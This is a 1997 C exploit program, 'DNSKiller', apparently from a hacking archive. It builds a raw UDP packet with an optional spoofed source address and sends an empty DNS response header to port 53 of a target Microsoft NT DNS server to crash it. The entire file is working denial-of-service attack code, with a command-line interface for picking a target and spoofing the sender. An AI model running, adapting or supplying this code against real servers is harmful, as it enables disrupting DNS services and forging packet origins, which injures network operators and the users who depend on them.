home *** CD-ROM | disk | FTP | other *** search
- /****************************************************************************
- ** DNSKiller
- ** Demonstrates a bug in Microsoft DNS server.
- ** Version 0.9-970210 - I don't know if this works.
- ** (c) 1997 - Rikhardur Egilsson - rikardur@skyrr.is
- *****************************************************************************/
-
- #include <string.h>
- #include <netdb.h>
- #include <stdio.h>
- #include <unistd.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netinet/ip.h>
- #include <netinet/ip_udp.h>
- #include <arpa/inet.h>
- #include <arpa/nameser.h>
-
- void Usage(char *str)
- {
-
- printf("Usage: %s [-s <source_host>] -d <dest_host>\n", str);
- printf(" <source_host> is an optional spoofed 'from' address.\n");
- printf(" <dest_host> is the NT DNS server.\n");
- exit(-1);
- }
-
-
- /****************************************************************************
- ** Use: host = GetHost(name)
- ** For: 'name' is 0, or points to a ASCIIZ string.
- ** After: 'host' is the, network byte order, IP number of 'host', if found,
- ** or 0 if not found.
- ** If 'name' was 0 'host' represents this host.
- *****************************************************************************/
- unsigned long int GetHost(char *name)
- {
-
- char buf[100];
- struct hostent *Host;
- unsigned long int value;
-
- if(!name)
- {
- gethostname(buf, 100);
- printf("Using this host as source..\n");
- name=buf;
- }
-
- if(!(Host=gethostbyname(name)))
- Host=gethostbyaddr(name, strlen(name), AF_INET);
- if(!Host)
- {
- printf("Unknown host: %s\n", (name)? name:"<NULL>");
- return(0);
- }
-
- memcpy(&value, Host->h_addr_list[0], 4);
- return(value);
- }
-
-
- /*************************************************************************
- ** Usage: i=SendUDP(from, to, data, len, socket)
- ** Fore: 'data' points to first byte of a UDP datagram of 'len' bytes.
- ** 'from' and 'to' represent IP addresses in network-byte-order.
- ** 'socket' must be an previously opened RAW_SOCKET.
- ** After: if i=1, 'data' was sent, via 'socket' as an UDP package to 'to'
- ** spoofed as originating from 'from'.
- ** if i!=1, an error occured and no data was send.
- *************************************************************************/
- int SendUDP(unsigned long int from, unsigned long int to, char *data,
- int len, int sock)
- {
-
- char buf[len+sizeof(struct iphdr)];
- struct in_addr host;
- struct iphdr *ip=(struct iphdr *)buf;
- struct sockaddr_in sin;
-
- sin.sin_family=AF_INET;
- sin.sin_addr.s_addr=to;
- sin.sin_port=((struct udphdr *)data)->dest;
-
- bzero((void *)buf, sizeof(struct iphdr)+len);
- ip->version=4;
- ip->ihl=5;
- ip->tos=0;
- ip->tot_len=htons(sizeof(struct iphdr)+len);
- ip->id=htons(0xdead);
- ip->frag_off=0;
- ip->ttl=255;
- ip->protocol=IPPROTO_UDP;
- ip->saddr=from;
- ip->daddr=to;
- /* Note: Checksum will be calculated by the kernel. */
-
- memcpy(buf+sizeof(struct iphdr), data, len);
-
- host.s_addr=(unsigned long int)from;
- printf("Sending from: %s -> ", inet_ntoa(host));
- host.s_addr=(unsigned long int)to;
- printf("to: %s ", inet_ntoa(host));
- printf(" %d bytes.\n", len);
-
- return(sendto(sock, buf,len+sizeof(struct iphdr), 0,
- (struct sockaddr *)&sin, sizeof(sin)));
-
- }
-
-
- void CreatePayload(char **Payload, int *len)
- {
-
- static char buf[sizeof(struct udphdr)+sizeof(HEADER)];
- struct udphdr *udp=(struct udphdr *)buf;
- HEADER *dns=(HEADER *) (buf+sizeof(struct udphdr));
-
- bzero((void *)buf, sizeof(HEADER)+sizeof(struct udphdr));
- udp->source=htons(1111);
- udp->dest=htons(53); /* domain */
- udp->len=htons(sizeof(struct udphdr)+sizeof(HEADER));
- udp->check=0;
- dns->qr=1; /* This is an answer */
-
- *len=sizeof(struct udphdr)+sizeof(HEADER);
- *Payload=buf;
- }
-
-
- int main(int argc, char *argv[])
- {
-
- extern char *optarg;
- extern int optind, opterr, optopt;
- char c, *source=0, *dest=0, *package;
- int sock, len;
- unsigned long int from, to;
-
- if((sock=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
- {
- printf("No raw socket. Who are you ?\n");
- exit(-1);
- }
- setuid(getuid());
-
- while(1)
- {
- c = getopt(argc, argv, "hs:d:");
- if( c == -1)
- break;
- switch(c)
- {
- case 's':
- source = optarg;
- break;
- case 'd':
- dest=optarg;
- break;
- case 'h':
- Usage(argv[0]);
- break;
- default:
- Usage(argv[0]);
- break;
- }
- }
- if(!dest)
- {
- printf("Huhm, ehrm, didn't we forget something ?\n");
- Usage(argv[0]);
- }
-
- from=GetHost(source);
- to=GetHost(dest);
- if(!from || !to)
- {
- printf("Error, can't locate ");
- printf("%s host address.\n", (from)? "target":"source");
- exit(-1);
- }
-
- CreatePayload(&package, &len);
- SendUDP(from, to, package, len, sock);
-
- return(0);
- }
- /* www.hack.co.za [2000]*/